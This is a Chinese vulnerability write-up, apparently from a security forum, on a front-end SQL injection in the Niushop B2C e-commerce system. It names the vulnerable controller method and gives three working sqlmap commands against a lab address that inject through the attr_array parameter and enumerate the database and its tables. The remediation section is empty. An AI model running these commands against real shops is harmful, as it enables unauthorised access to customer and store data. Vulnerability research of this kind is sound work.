某Shop前台SQL注入
Onlywait 漏洞分析 65103浏览 · 2019-11-18 01:20

0x01 前言

Niushop B2C商城系统基于ThinkPHP5.0开发,源码全部开放(100%),商用免费,四网合一,满足用户、企业、开发者、服务商等角色要求

0x02 代码分析

跟踪到/Application/(wap/shop)/Controller/Goods.php中的ajaxGoodsList方法




0x04 漏洞复现

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql"

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" --current-db

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" -D niushop_b2c --tables

0x05 漏洞修复


0 条评论
某人
表情
可输入 255